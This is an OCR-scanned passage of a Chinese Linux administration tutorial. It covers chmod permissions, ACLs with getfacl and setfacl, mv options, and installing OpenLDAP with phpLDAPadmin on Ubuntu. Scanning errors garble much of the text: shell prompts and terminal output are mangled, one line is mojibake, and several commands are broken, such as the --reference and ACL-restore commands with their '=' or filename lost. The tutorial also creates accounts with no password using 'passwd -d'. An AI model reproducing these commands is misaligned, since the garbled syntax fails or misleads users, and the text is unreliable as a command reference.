如 下 面 截图 所 示 : 


root@kali:/example# ls -l testfile.txt 

--WX--X--- 1 root root 39 Nov 30 02:36 testfile.txt 
root@kali:/example# chmod a+r testfile.txt 
root(ükali:/example£ ls -l testfile.txt 

-rwxr-xr-- 1 root root 39 Nov 30 02:36 testfile.txt 


root(lkali:/example£ chmod a-r testfile.txt 
root(ükali:/example£ ls -l testfile.txt 

--WX--X--- 1 root root 39 Nov 30 02:36 testfile.txt 
root@kali:/example# 


5. 如 果 想 为 目录 中 的 所 有 文件 添加 某 种 权限 。 不 需要 运行 chmod 命 令 对 所 有 文件 逐一 操作 ， 可 以 使 用 “-R” 选 项 通过 循环 
递归 的 方式 完成 。 例 如 ， 为 其 他 人 添加 对 当前 目录 下 所 有 文件 及 子 目 录 的 执行 权限 ， 可 以 使 用 下 面 这 条 命令 : 


chmod o+x -R /example 


执行 结果 如 下 图 所 示 : 


root(ükali:/examplef£ ls -l 

total 12 

drwxrwX---* 3 userl userl 4096 Nov 23 17:41 accounts 
-rw-r--r-- 1 root root © Nov 23 17:54 permissions.acl 
drwxr-xr-x 2 root root 4096 Nov 28 16:25 Test Directory 
--WX--X--- 1 root root 39 Nov 30 02:36 testfile.txt 
root(lkali:/example£ chmod o+x -R /example/ 


root(ükali:/example£ ls -l 

total 12 

drwxrwx--x+ 3 userl userl 4096 Nov 23 17:41 accounts 
-rw-r--r-x 1 root root OQ Nov 23 17:54 permissions.acl 
drwxr-xr-x 2 root root 4096 Nov 28 16:25 Test Directory 
--wX--X--x 1 root root 39 Nov 30 02:36 testfile.txt 
root(lkali:/example£ 


6. 可 以 使 用 reference 选 项 将 某 个 文件 的 权限 复制 给 另 一 个 文件 : 


chmod --reference-filel file2 


上 述 命令 将 文件 file1 的 权限 复制 给 另 一 个 文件 file2。 使 用 同样 的 命令 可 以 实现 将 一 个 目录 的 权限 复制 给 另 一 个 目录 : 


root(ükali:/example/Test Directory# ls -l 

total 8 

-rwxr-x-w- 1 root root 14 Nov 30 02:41 filel 

-rw-r--r-- 1 root root 13 Nov 30 02:42 file2 
root(ükali:/example/Test Directoryf£ chmod --reference-filel file2 
root(ükali:/example/Test Directory£ ls -l 


total 8 

-rwxr-x-w- 1 root root 14 Nov 30 02:41 filel 
-rwxr-x-w- 1 root root 13 Nov 30 02:42 file? 
rootükali:/example/Test Directory£ 


chmod 命 令 需 要 与 符号 表达 式 一 起 使 用 。 代 表 用 户 的 符号 如 下 : 

“ u 代 表 文 件 或 目录 的 所 有 者 

 g 文 件 或 目录 所 属 的 组 

0 除了 文件 或 目录 的 所 有 者 或 所 属 组 之 外 ， 其 他 用 户 均 属于 此 范围 


代表 不 同 访问 权限 的 符号 如 下 : 


和 人行 


可 以 利用 上 面 的 俏 令 ， 根 据 需求 更 改 用 户 、 用 户 组 或 其 他 人 对 文件 访问 权限 。 


拓展 学 习 


在 使 用 chmod 命 令 的 时 人 息 ， 除 了 上 述 方 法 ， 还 可 以 利用 八进制 数字 来 设置 对 文件 的 访问 权限 。 利 用 数字 可 以 同时 完成 对 拥 
有 者 、 用 户 组 和 其 他 人 访问 权限 的 设置 。 这 个 命令 的 语法 格式 如 下 : 


chmod xxx file/directory 


在 此 ，xxx 的 每 一 位 都 是 一 个 1 ~ 7 之 间 的 数字 。 第 一 位 代表 拥有 者 的 访问 权限 ; 第 二 位 代表 用 户 组 的 访问 权限 ; 第 三 位 代表 
其 他 人 的 访问 权限 。 


当 使 用 八进制 表示 法 时 ，r、w 和 x 每 一 种 权限 都 对 应 一 个 数值 ， 对 应 天 系 如 下 : 


对 读 和 执行 权限 使 用 数字 同时 进行 设置 时 ， 按 如 下 方法 计算 数值 : 
`- r-x=4+0+1=5 

同样 ， 读 、 写 和 执行 三 种 权限 可 以 计算 如 下 : 

:fwx=4+2+1=7 

如 果 只 想 配置 单一 的 读 权 限 ， 如 下 所 示 : 

- 1--=4+0+0=4 


现在 运行 下 面 这 条 命令 ， 它 将 按照 数字 代表 的 权限 设置 文件 的 权限 : 
chmod 754 testfile.txt 


如 下 面 截图 所 示 : 


rootQkall:/example# ls -l testfile.txt 
-rw--w-rwx 1 root root 39 Nov 30 02:36 testfile.txt 
root(lkali:/example£ chmod 754 testfile.txt 


root(ükali:/example£ ls -l testfile.txt 
-rwxr-xr-- 1 root root 39 Nov 30 02:36 testfile.txt 
root(ükali:/example£ $ 


3.3 ”使 用 访问 控制 鹿 表 


使 用 chmod 命 令 对 文件 的 基本 访问 权限 实施 控制 是 不 够 的 ， 还 需要 使 用 访问 控制 列表 (ACL) 。 使 用 ACL， 除 了 能 为 某 个 
特定 文件 的 拥有 者 和 用 户 组 提供 访问 权限 配置 乙 外 ， 还 可 以 为 任何 用 户 、 用 户 组 或 者 不 属于 某 个 组 的 所 有 用 户 配置 访问 权限 。 


准备 工作 


在 开始 使 用 ACL 配 置 访问 权限 之 前 ， 需 要 确定 ACL 功 能 是 否 开 启 。 可 以 通过 下 面 这 条 查看 一 个 文件 ACL 的 命令 来 验证 ACL 功 
能 是 否 已 经 开启 : 


getfacl «filename» 


如 果 ACL 已 经 局 用 ， 执 行 上 面 这 条 命令 将 得 到 和 下 图 类 似 的 结果 : 


$ getfacl accounts 
# file: accounts 
# owner: userl 

# group: userl 
user: :rwx 
user:userl:rwx 


user:user2 :rwx 
group: :r-x 
mask: : rwx 
other::--- 


操作 指南 


按照 下 面 的 步骤 依次 操作 ， 可 以 帮助 你 更 好 地 理解 ACL 的 功能 。 


1. 首 先 ， 创建 3 个 用 户 ， 分 别 命 名 为 user1、user2 和 user3: 


rootükali:-£€ useradd userl 

rootükali:-4 passwd -d userl 

passwd: password expiry information changed. 
rootükali:-4€ useradd user?2 

rootükali:-4€ passwd -d user2 

passwd: password expiry information changed. 


rootükali:-4 useradd user3 

rootükali:-4 passwd -d user3 

passwd: password expiry information changed. 
root(ikal »:-É Y 


上 面 的 “passwd” 命令 用 来 更 改 用 户 的 口令 信息 ， 是 一 个 可 选项 ， 读 者 也 可 以 忽略 。 其 中 的 “-d” 选项 表示 删除 指定 用 户 
的 口令 [1 


2. 下 一 步 ， 创 建 一 个 用 户 组 ， 例 如 group1。 然 后 将 之 前 创建 的 3 个 用 户 添加 到 这 个 组 中 : 


root@kali:~# addgroup groupl 

Adding group ^ groupl' (GID 1004) 
Done. 

root@kali:~# usermod -G groupl userl 
root(ükali:-£€ usermod -G groupl user?2 
root(ükali:-4€ usermod -G groupl user3 
rootükali:-4 B 


3. 下 一 步 ， 创 建 一 个 目录 /example 并 将 其 拥有 者 更 改 为 user1 : 


rootükali:-£ mkdir /example 
root(ükali:-4 chown userl /example 
root(ikali:-4 i 


4. FER Zum ER DALARBPuserTRS EH ERR. PAISSESUNIZIGIEEBJ/exampleB3, EXNER RACER, MAY 


accounts: 


$ cd /example 
$ mkdir accounts 


$E 


5. 假 设 用 户 user1 仅 希望 在 accounts 目 录 中 赋予 用 户 user2 写 权限 。 如 果 利 用 上 面 的 chmod 人 命令， 那么 用 户 user1 只 能 通过 
为 组 group1 设 置 写 权限 完成 操作 。 但 同时 也 会 赋予 用 户 user3 写 权限 ， 而 这 是 用 户 user1 不 希望 发 生 的 。 所 以 ， 用 户 user1 可 以 
通过 使 用 ACL 来 仅 赋 予 用 户 user2 写 权限 ， 如 下 图 所 示 : 


$ setfacl -m u:userl:rwx accounts 
$ setfacl -m u:user2:rwx accounts 
$ setfacl -m other:--- accounts 


t 


6. 接 下 来 ， 核 查 一 下 accounts 目 录 各 用 户 的 访问 权限 情况 : 


$ getfacl accounts 
# file: accounts 

# owner: userl 

£ group: userl 
user: : rwx 
user:userl:rwx 
Luser:user?2:rnrwx 
group ::r-Xx 
mask: : rwx 
other::--- 


从 上 面 的 图 片 中 可 以 看 到 ， 这 个 目录 仅 用 户 user1 和 user2 具 有 写 权 限 ， 其 他 用 户 不 具备 这 一 权限 。 


7. 打 开 一 个 新 的 终 站 并 以 用 户 user2 的 身份 登录 ， 然 后 切换 到 /example 目 录 下 : 


root(ükali:-£4 su user? 
$ cd /example 
$ 


8. 试 着 在 accounts 文 件 夹 下 创建 新 的 目录 。 既 然 用 户 user2 拥 有 写 权 限 ， 访 操作 应 该 是 可 以 成 功 执行 的 。 


$ cd accounts 
$ mkdir dirl 
$ ls 

dirl 


9. 打 开 新 的 终端 并 以 用 户 user3 的 身份 登录 ， 切 换 到 /example 目 录 下 : 


root(ükali:-4 su user3 
$ cd /example 


$ E 


10. 试 着 进入 到 accounts 目 录 。 因 为 用 户 user3 对 该 目录 不 具有 任何 访问 权限 ， 访 操作 请 求 会 被 拒绝 : 


$ cd accounts 
cd: can t cd to accounts 


拓展 学 习 


有 了 时 可 能 仅 需 要 为 某 一 用 户 组 中 的 某 两 位 用 户 配 置 执行 权限 。 如 果 通 过 chmod 命 令 来 完成 这 一 操作 ， 那 么 在 这 个 组 中 的 所 
有 用 尸 都 会 具有 执行 权限 。 可 以 使 用 ACL 来 避免 这 一 情况 的 友 生 。 


通过 上 面 几 步 操 作 ， 已 经 分 别 为 每 一 个 用 户 设置 了 访问 权限 ， 同 时 也 避免 了 其 他 用 户 获 得 任何 权限 的 可 能 。 
不 论 何 时 要 对 文件 的 访问 权限 进行 更 改 ， 如 果 这 些 文件 非常 重要 ， 那 么 最 好 对 文件 当前 的 访问 权限 配置 进行 备份 。 


这 里 假设 有 一 个 example 目 录 中 包含 一 些 重要 文件 。 使 用 下 面 的 命令 对 访问 权限 进行 备份 : 


getfacl -R /example» permissions.acl 


rootükali:/£ getfacl -R /example» permissions.acLl 
getfacl: Removing Leading '/' from absolute path names 
root(ükali:/£ cd example/ 


root(lkali:/example£ ls 
accounts permissions.acl 
rootükali:/example& Bi 


上 面 的 命令 对 这 些 文件 的 访问 权限 进行 备份 ， 并 存储 在 一 个 名 为 permissions.acl 的 文件 中 。 


如 果 想 恢复 这 些 文件 的 访问 权限 配置 ， 可 以 使 用 如 下 命令 : 
setfacl -- restore-permission.acl 


如 下 图 所 示 : 


root(ükali:/example£ setfacl --restore-permissions.acl 


root@kali:/example# $ 


这 个 命令 将 按照 备份 文件 创建 时 的 位 置 恢复 对 应 文件 的 访问 权限 。 


上 如果 用 户 的 口令 被 删除 ， 那 么 认证 该 用 户 将 不 需要 输入 口令 。 但 是 ， 在 有 些 情 况 下 ， 某 
译 者 注 


Je 


应 用 可 能 会 拒绝 这 种 用 户 的 访问 。 


3.4 ”使 用 mv 命令 处 理 文 件 (移动 和 重 命名 ) 


当 希 望 将 文件 从 一 个 目录 移动 到 另 一 个 目录 同时 不 创建 副本 (使 用 cp 命令 会 友 生 的 情况 ) 时 ， 通 常 使 用 mv 或 hove 命令。 


因为 mv 命令 是 Linux 内 置 命 令 ， 所 以 不 需要 进行 任何 额外 的 配置 。 


在 每 一 个 Linux 系 统 中 ， 访 命令 都 是 默认 安 半 的 。 接 下 来 我 们 看 看 通过 不 同方 式 使 用 mv 命令 的 例子 : 


1. 可 以 使 用 如 下 命令 将 文件 testfile1.txt 从 当前 目录 移动 到 其 他 目录 下 ， 比 如 home/practical/example 目 录 : 


mv testfilel.txt /home/practical/example 


只 有 当 源 文件 所 处 的 位 置 与 要 移动 到 的 目的 文件 夹 不 一 致 时 ， 上 述 命 令 才 会 执行 。 


当 使 用 上 述 命令 时 ， 文 件 会 从 原来 它 所 处 的 位 置 删除 。 


root(kal 1:-4 ls 

build module Downloads mkinitcpio netconsole.log  testfile.txt 
rootükali:-£€ mv testfile.txt /home/practical/example/ 

rootükali:-* cd /home/practical/example/ 
root(ükali:/home/practical/example£ ls 


testfile.txt 

root(ükali:/home/practical/example£ cd 

root(ükali:-4 ls 

build module Downloads mkinitcpio netconsole.log 


2 可 以 使 用 一 个 命令 同时 移动 多 个 文件 : 


mv testfile2.txt testfile3.txt testfile4.txt /home/practical/ 
example 


当 使 用 上 述 命令 时 ， 要 求 所 有 被 移动 的 文件 都 处 于 同一 目录 下 : 


root@kali:~/example# ls 

filel file2 file3 practical 

root(ükali:-/example£ mv filel file2 file3 /home/practical/example/ 
root(lkali:-/example£ ls 

practical 


root(ükali:-/example£ cd /home/practical/example/ 
root(lkali:/home/practical/example£ ls 

filel file2 file3 testfile,.txt 
root(lkali:/home/practical/example£ 


3. 移 动 一 个 文件 夹 和 移动 一 个 文件 使 用 相同 的 命令 。 假 设想 将 当前 目录 下 的 文件 夹 directory1 移 动 
到 /home/practical/example 目 录 下 ， 可 以 使 用 如 下 命令 : 


mv directoryl/ /home/practical/example 


如 下 图 所 示 : 


rootükali:-4 ls 

build module directoryl example myfile permissions.acl 
Desktop Downloads mkinitcpio netconsole.log 

root@kali:-# mv directoryl/ /home/practical/example/ 


root@kali:-~-# cd /home/practical/example/ 
root(ükali:/home/practical/example£ ls 
directoryl filel file2 file3 testfile.txt 
root(ükali:/home/practical/example£ 


4.mv 命 令 还 可 用 于 对 文件 和 文件 夹 重 命名 。 假 如 想 把 文件 example 1.txt 重 命名 为 example 2.txt， 可 以 使 用 如 下 命令 : 
mv example 1.txt example 2.txt 


只 有 文件 的 源 路 径 和 目的 路 径 相 同 的 时 候 上 述 命令 才 有 效 。 


root(ükali:-/example£ ls 

example l.txt practical 

root(ükali:-/example£ mv example l.txt example 2.txt 
rootükali:-/example£ ls 

example 2.txt practical 

rootükali:-/example£ Bg 


5. 重 命名 一 个 目录 和 上 述 重 命名 一 个 文件 使 用 相同 的 操作 。 假 如 想 把 目录 test directory 1 重 命 名 为 test directory 2， 可 以 
使 用 如 下 命令 : 


mv test directory 1/ test directory 2/ 


上 述 命令 的 执行 结果 如 下 图 所 示 : 


root(ükali:-/example£x ls 
example 2.txt practical test directory 1 
root@kali:~/example# mv test directory 1/ test directory 2 


root(ükali:-/example£s ls 
example 2.txt practical test directory 2 
root(ükali:-/example£ I 


6. 当 使 用 mv 命令 对 大 批量 的 文件 或 目录 进行 移动 或 重 命名 操作 时 ， 可 以 使 用 -v 选 项 来 检查 操作 是 否 成 功 。 


7. 要 将 当前 目录 下 所 有 的 文本 文件 移动 到 /home/practical/example 目 录 下 ， 并 对 操作 进行 检查 时 ， 可 以 使 用 如 下 命令 : 


mv -v *.txt /home/practical/example 


上 述 命令 的 执行 结果 如 下 图 所 示 : 


:~/example# ls 
example 3.txt practical 
example 4.txt test directory 2 
:~/example# mv -v *.txt /home/practical/example/ 
"example l.txt' -> / /home/practical/example/example l.txt' 


"example 2.txt' ->  /home/practical/example/example 2.txt' 
example 3.txt' ->  /home/practical/example/example 3.txt' 


txt -> /home/practical/examp 
;-./example£s 
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root(lkali:-/example£ mv -v test directory 2/ /home/practical/example/ 
"test directory 2/' ->  /home/practical/example/test directory 2' 
rootükali:-/example£ Bj 


9. 当 使 用 默认 的 mv 命令 将 一 个 文件 移动 到 另 一 个 目录 时 ， 如 果 这 个 目录 下 已 经 有 一 个 同名 的 文件 ， 那 么 这 个 同名 文件 将 会 
馈 履 盖 。 但 是 ， 如 果 希 望 在 覆 匡 这 个 同名 文件 之 前 弹出 一 个 提醒 ， 那 么 就 需要 使 用 “-i” 选 项 ， 如 下 面 这 条 命令 : 


mv -i testfilel.txt /home/practical/example 


上 述 命令 在 运行 时 ， 如 果 人 在 目标 目录 中 友 现 与 将 要 移动 的 文件 同名 的 文件 ， 融 会 弹出 提醒 。 只 有 按 <y> 键 进行 确认 才 会 完成 


该 命令 的 执行 ， 否 则 ， 命 令 会 被 取消 : 


rootükali:-4 ls 

build module Downloads mkinitcpio netconsole.log  testfile.txt 
Desktop example myfile permissions.acl 

rootükali:-4 mv -i testfile.txt /home/practical/example/ 

mv: overwrite ^" /home/practical/example/testfile.txt'? y 


rootükali:-4 ls 
build module Downloads mkinitcpio netconsole.log 
Desktop example myfile permissions.acl 
root@kali:-# J 


10. 当 目标 目录 有 一 个 同名 文件 存在 时 ， 如 果 使 用 “-u” 选 项 ， 那 么 只 有 源 文 件 比 目的 目录 中 同名 文件 的 日 期 新 时 才 可 以 将 
PENER. 


在 源 目 录 中 有 两 个 文件 : file_1.txt 和 file_2.txt。 首 先 使 用 如 下 命令 查看 文件 的 相关 信息 : 


ls -l *.txt 


查看 目的 目录 下 文件 的 相关 信息 : 
ls -1 /home/practical/example/*.txt 
使 用 如 下 命令 进行 移动 文件 操作 : 

mv -uv *.txt /home/practical/example/ 
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rootükali:-/example£ ls -l *.txt 
-rw-r--r-- 1 root root 20 Nov 28 15:05 example l.txt 
root(ükali:-/example£ ls -l /home/practical/example/*.txt 


-rw-r--r-- 
-rw-r--r-- 


root root 20 Nov 14:46 /home/practical/example/example l.txt 
root root 25 Nov 14:27 /home/practical/example/example 2.txt 


1 
1 

-rw-r--r-- 1 root root 20 Nov 14:47 /home/practical/example/example 3.txt 
1 


-rw-r--r-- root root 19 Nov 14:47 /home/practical/example/example 4.txt 
-rwxr-xr-x 1 root root 39 Nov 14:55 /home/practical/example/testfile,.txt 
rootükali:-/example£ mv -uv *.txt /home/practical/example/ 

"example l.txt' -> '/home/practical/example/example l.txt' 
root(ükali:-/examples£ B 
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下 ， 可 以 使 用 “-n” 选项， 如 下 面 步骤 所 示 。 


12. 在 源 目录 中 有 两 个 文件 : file 1.txt 和 file 2.txt。 首 先 使 用 如 下 命令 查看 文件 的 相关 信息 : 

ls -1 *.txt 

13. 使 用 如 下 命令 移动 文件 : 

mv -nv *.txt /home/practical/example/ 
14. 查 看 目的 目录 中 文件 的 相关 信息 : 

ls -1 /home/practical/example/*.txt 


15. 通 过 观察 时 间 截 信息 可 以 看 到 同名 的 文件 没有 被 移动 。 


rootükali:-/example£& ls -l *.txt 

-rw-r--r-- l root root 44 Nov 28 15:22 example l.txt 

-rw-r--r-- 1 root root 43 Nov 28 15:23 example 2.txt 

rootükali:-/example£ mv -nv *.txt /home/practical/example/ 
root(ükali:-/example£& ls -l /home/practical/example/*.txt 

-rw-r--r-- l root root 20 Nov 28 15:05 /home/practical/example/example l.txt 
-rw-r--r-- 1 root root 25 Nov 28 14:2/ /home/practical/example/example 2.txt 


-rw-r--r-- l root root 20 Nov 28 14:47 /home/practical/example/example 3.txt 
-rw-r--r-- 1 root root 19 Nov 28 14:47 /home/practical/example/example 4.txt 
-rwxr-xr-x 1 root root 39 Nov 28 14:55 /home/practical/example/testfile.txt 
root(lkali:-/example£ W 


16. 在 进行 文件 移动 操作 时 ， 当 目的 目录 下 友 现 仔 在 一 个 同名 文件 时 ， 可 以 在 这 个 文件 做 履 兰 之 前 为 其 创建 一 个 备份 。 使 
用 “-b” 选 项 可 以 完成 这 一 操作 : 


mv -bv * .txt /home/practical/example 


17. 接 下 来 ， 查 看 一 下 目的 目录 下 各 文件 的 相关 信息 。 在 文件 信息 列表 中 ， 可 以 看 到 有 两 个 名 字 分 别 为 file1.txt ~ 和 file2.txt 
~ 的 文件 。 验 证 时 间 戳 信息 可 以 上 友 现 ， 这 两 个 文件 比 移动 过 来 的 源 文 件 file1.txt 和 file2.txt 时 间 更 早 。 


root(ükali:-/example£ mv -bv *.txt /home/practical/example/ 

"example l.txt' -> '/home/practical/example/example l.txt' (backup: '"/home/pract 
ical/example/example l.txt-') 

"example 2.txt' -> '/home/practical/example/example 2.txt' (backup: '/home/pract 
ical/example/example 2.txt-') 

root(ükali:-/example£ ls -l /home/practical/example/ 


root root 4096 Nov directoryl 
root root Nov example 1. 
a, SA ea re root root Nov :05 example 1. 
A RRA RE 
ped dl E 
S i A 


root root Nov : example 2. 
root root Nov : example 3. 
root root Nov example 4. 


2 
] 
] 
ZINC CPISVIDFBBL POE Nov :23 example 2. 
] 
] 
] 


可 以 在 shell 中 输入 “man mv” 或 者 “mv--help” 对 mv 命令 进行 深入 学 习 。 这 个 命令 将 展示 手册 页 中 天 于 mv 命令 更 多 的 
相 天 细节 信息 。 


Lightweight Directory Access Protocol ( 轻 量 级 目录 访问 协议 ) ， 即 LDAP， 是 用 来 对 文件 或 目录 层次 的 访问 权限 进行 集 
中 管理 的 协议 。 这 个 目录 类 似 于 数据 库 ， 但 包含 更 多 摘 述 性 的 、 基 于 属性 的 信息 。LDAP 主 要 用 于 集中 的 授权 认证 。 


安装 和 配置 LDAP 之 前 ， 需 要 先 创建 一 个 Ubuntu 服务 器 。 最 新 版 本 的 Ubuntu 服务 器 安装 文件 可 以 
在 http://www.ubuntu.com/download/server 下 载 到 。 下 载 之 后 ， 按 照 里 面 所 给 的 步骤 进行 安 半 。 


接 下 来 需要 安 凌 一 个 桌面 版 的 Ubuntu 系统 。 我 们 将 使 用 它 通过 Web 接 口 访 问 LDAP 服 务 器 。 


完成 这 些 工 作 之 后 ， 我 们 束 可 以 着 手 安 法 LDAP 服 务 嚣 了。 
操作 指南 


接 下 来 着 手 在 Ubuntu 服务 器 上 安 半 并 配置 LDAP 协 议 。LDAP 的 安 妆 需要 Ubuntu 默认 资源 库 中 的 slapd 软 件 包 . 


1. 首 先 更 新 服务 器 的 软件 包 列表 ， 执 行 如 下 命令 从 Ubuntu 资源 库 中 获取 所 有 软件 包 的 最 新 版 本 以 及 依赖 关系 的 信息 。 
sudo apt-get update 


2. 执 行 下 面 的 命令 安装 slapd 软 件 包 : 
sudo apt-get install slapd 


执行 结果 如 下 图 所 示 : 


ajinder?munetuork:" 3 sudo apt-get install slapd 
Reading package lists... Done 
Building dependencu tree 
Reading state information... Done 
The follouing extra packages will be installed: 
libldap-Z.4-Z2 libodbci libslp1 
Suggested packages: 
libnyodbc odbc-postqgresql tdsodbc unixodbc-bin slpd openslp-doc ldap-utils 
The follouing NEU packages will be installed: 
libodbci libslpi1 slapd 
The following packages will be upgraded: 
libldap-Z.4-z 
1 upgraded, 3 newly installed, 0 to remove and 8Z not upgraded. 
eed to get 1,628 kB of archives. 
(after this operation, 4,919 kB of additional disk space will be used. 
Do you want to continue"? [Y^nl 


3. 在 安装 过 程 中 ， 会 被 提示 输入 并 确认 管理 员 (administrator) 的 密码 ， 该 密码 用 于 LDAP 管 理 员 账号 。 用 户 设置 密码 并 结 
束 安装 过 程 : 


Configuring slapd 
Please enter the passuord for the admin entry in your LDAP directory. 


fidministrator passuord: 


4. 下 一 步 ， 安 疼 LDAP 需 要 的 一 些 其 他 实用 工具 : 


sudo apt-get install ldap-utils 


执行 命令 的 返回 结果 如 下 图 所 示 : 


ta jinder@mynetwork:™ 3 sudo apt-get install ldap-utils 
Heading package lists... Done 
Building dependency tree 
Reading state information... Done 
The follouing NEU packages vill be installed: 
ldap-uti ls 
0 upgraded, 1 newly installed, O to remove and Be not upgraded. 
Need to get 116 kB of archives. 
After this operation, 674 kB of additional disk space will be used. 
Get:1 http:^//in.archive.ubuntu.com^ubuntu^ trusty-updates^main ldap-utils i386 Z2.4.31-1*nmuZubuntu8. 
2 [116 kB] 
Fetched 116 kB in 1s (84.8 kB/s) 
Selecting previously unselected package ldap-utils. 


(Heading database ... 62416 files and directories currently installed.) 
Preparing to unpack ...^/ldap-utils 2.4.31-1*nmuZubuntu8B.Z i386.deb ... 
Unpacking ldap-utils (2.4.31-1*nmuZubuntu8B.Z) ... 

Processing triggers for man-db (Z2.6.7.1-1ubuntu1) 

Setting up Idap-utils (2.4.31-1*nmuZubuntu8 .Z) 

ta jinder&nynetuork:^$ 


5 .一旦 安装 完成 ， 我 们 就 启动 并 按照 需要 重新 配置 LDAP 软 件 包 。 输 入 如 下 命令 启动 配置 工具 : 
sudodpkg-reconfigure slapd 


6. 在 配置 过 程 中 会 提出 一 系 询 的 问题 ， 按 照 需 要 逐个 选择 合适 的 选项 。 


7. 首 先 ， 会 弹出 是 否 省 略 OpenLDAP 服 务 器 配置 的 问题 。 选 择 No 并 继续 : 


If you enable this option, no initial configuration or database will be created for you. 


Umit OpenLDAP server configuration? 


£Tes» 


8. 下 一 步 ， 需 要 输入 域名 (domain name) 。 可 以 使 用 服务 器 上 已 有 的 域名 也 可 以 重新 创建 。 本 例 中 使 用 example.com : 


Conf iguring slapd 
Ihe DMS domain name is used to construct the base DN of the LDAP directory. For example, 
'foo.example.org' will create the directory with 'dc-foo, dc-example, dc-org' as base DM. 


DNS domain name: 


9. 根 据 提 示 输 入 组 织 名 (Organization Name) : 


Conf iguring slapd 
Please enter the name of the organization to use in the base DM of your LDAP directory. 


(Iryanization name: 


«Uk» 


10. 接 下 来 会 被 提示 输入 LDAP 的 管理 员 密 码 。 在 之 前 安装 的 过 程 中 已 经 配置 过 该 密码 ， 在 此 输入 相同 密码 或 根据 需要 进行 更 
W: 


Conf iguring slapd 
Please enter the password for the admin entry in your LDAP directory. 


fidministrator passuord: 


11.3443 Database backend to _ use 提示 时 ， 选 择 HDB 选 项 : 


Conf iguring slapd 
The HDE backend is recommended. HDB and BDB use similar storage formats, but HDE adds 
support for subtree renames. Both support the same configuration options. 


In either case, you should review the resulting database configuration for your needs. See 
/]usr/sharez/docz^slapdÁ^README.DB COMFIG.qgz for more details. 


Database backend to use: 


12. 当 询问 删除 slapd 时 是 否 移 除 数据 库 ， 选 择 No: 


Conf iguring slapd 


Do you want the database to be removed when slapd is purged? 


«es? 


13. 下 一 步 ， 当 出 现 提 示 是 否 移动 旧 数 据 库 时 ， 选 择 Yes 从 而 允许 配置 程序 创建 一 个 新 的 数据 库 : 


Conf iguring slapd 
There are still files in ^varz/libz/ldap which will probably break the configuration process. 
If you enable this option, the maintainer scripts will move the old database files out of 
the way before creating a neu database. 


Move old database"? 


14. 当 询问 是 否 人 允许 LDAPv2 协 议 时 ， 选 择 No: 


Conf iguring slapd 
Ihe obsolete LDüPuZ protocol is disabled by default in slapd. Programs and users should 
upgrade to LDAPv3. If you have old programs which can't use LDAPv3, you should select this 
option and 'allou bind vZ' will be added to your slapd.conf file. 


ñllow LDAPv2 protocol? 


15. 配 置 完 成 后 ， 开 始 安 半 phpldapadmin 软 件 包 。 它 可 以 让 管理 员 使 用 Web 管 理 接口 管理 LDAP 服 务 : 


sudo apt-get install phpldapadmin 


如 下 图 所 示 : 


ta jinderemunetuwork : 3 sudo apt-get install phpldapadmin 

Heading package lists... Done 

Building dependencu tree 

Reading state information... Done 

Ihe folloving extra packages will be installed: 
apacheZ apacheZ-bin apacheZ-data libapacheZ-mod-php5 libapri libaprutilil 
libaprutili-dbd-sqQglite3 libaprutili-ldap php5-cli php5-common php5- json 
php5-1dap php5-readline 

ouggested packages: 
apacheZ-doc apacheZ-suexec-pristine apacheZ-suexec-custom apachez-utils 
php-pear php5-user-cache 

The following NEW packages will be installed: 
apacheZ apacheZ-bin apacheZ-data libapacheZ-mod-php5 libapri libaprutili 
libaprutili-dbd-sgqglite3 libaprutili-l1dap php5-cli php5-common php5- json 
php5-1dap php5-readline phpldapadmin 

0 upgraded, 14 newly installed, 0 to remove and Bz not upgraded. 

Need to get 6,795 kB of archives. 

After this operation, 29.5 MB of additional disk space will be used. 

Do you want to continue? [in] _ 


16. 当 安装 完成 后 ， 打 开 phpldapadmin 的 配置 文件 设 定 一 些 参数 值 : 


sudo nano /etc/phpldapadmin/config.php 


如 下 图 所 示 : 


tajinderBmynetuork: 3 sudo nano ^etc^/phpldapadminzconf ig .php _ 


17. 搜 索 下 图 中 给 定 的 部 分 ， 修 改 为 Ubuntu 服务 器 的 域名 或 1|P 地 址 : 


$servers-»setValue('server','host','domain nam or IP address'); 


如 下 图 所 示 : 


“ 兴 Examples: 
1dap .ExamDple .com , 
" Idaps:7^71dap.example.com^' , 


" ]dapi:^^z2fusrzlocalz2fvarz2frunzzfldapi' 


(Unix socket at ^usr^/local^/var^/runzldap) x^ 
Sseruers-»setUaluet' server’ ,' host' ,' 192.168.83.133' 5; 


18. 接 下 来 编辑 下 面 这 个 条 目 ， 输 入 之 前 重新 配置 slapd 软 件 包 时 所 给 的 域名 : 


$Sservers-»setValue('server','base',array('dc-zexample,dc-com')); 


按照 上 面 的 格式 将 域名 赋值 给 dc 属性 。 因 为 当前 的 域名 是 example.com， 所 以 上 面 的 输入 应 该 是 : 


dc=example，dc=com。 


Sseruers-»setUaluet' seruer' ,' base’ ,arraUf dc-exanple,dc-con' )); 


19. 找 到 下 面 这 行 ， 再 次 将 域名 作为 dc 属性 输入 。 对 于 cn 属性 ， 其 值 应 为 admin : 


$servers-»setValue('login','bind id', 'cn=admin,dc=example,dc=com'); 


如 下 图 所 示 : 


/^* The DN of the user for phpLDAPadmin to bind with. For anonymous binds or 
"conakie',' session or sasl auth tupes, LEAVE THE LüGIN DN AND LOGIN_Phss 
BLANK. If uou specify a loqin attr in con junction with a cookie or session 
auth tupe, then you can also specify the bind id^/bind pass here for searchin 
the directory for users (ie, if your LDAP server does not allow anonymous 
binds. x 

Sseruers-»setUaluet' login' ,' bind id','cn-admin,dc-example,dc-conm' ): 


20. 找 到 和 下 面 这 段 代码 中 内 容 相 似 的 部 分 ， 首 先 取 消 前 面 的 注释 符号 ， 然 后 将 其 值 设 置 为 true: 


$config-»custom-»appearance['hide template warning'] = true; 


如 下 图 所 示 : 


/^* Hide the warnings For invalid ob jectClasses/attributes in templates. x^ 


Sconf ig-»custom-»appearance['hide template warning']l = true: 


21. 完 成 所 有 这 些 配置 更 改 之 后 ， 保 存 并 关闭 文件 。 


22. 当 完成 phpldapadmin 的 配置 之 后 ， 在 另 一 个 桌面 版 系统 中 打开 浏览 器 。 人 在 地 址 栏 中 输入 服务 器 的 域名 或 1P 地 址 ， 后 面 
加 上 /phpldapadmin， 即 domain_ name or IP address/phpldapadmin: 


Ña phpLDAPadmin (1.2.2) - | s | 
€ eb 192.168.83.133/phpldapadmin/ 


a g A 


iY Google 


a php 
aLDAP 
sadmin pe S 1^ 


Home | Purge caches | Show Cache 


A) My LDAP Server 


党 login = li 
LDAP 
zadmin 


Use the menu to the left to navigate 


Credits | Documentation | Donate 


